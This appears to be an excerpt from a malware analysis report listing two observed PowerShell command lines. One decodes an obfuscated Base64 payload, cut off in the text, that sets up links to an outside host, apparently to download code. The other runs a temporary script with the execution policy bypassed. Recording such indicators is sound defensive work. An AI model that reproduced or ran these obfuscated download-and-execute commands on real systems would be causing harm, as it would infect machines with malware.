Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2hlYXZlbnRlY2hub2xvZ2llcy5jb20ucGsvYXB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -file %TEMP%\rzsPrHsBem.ps1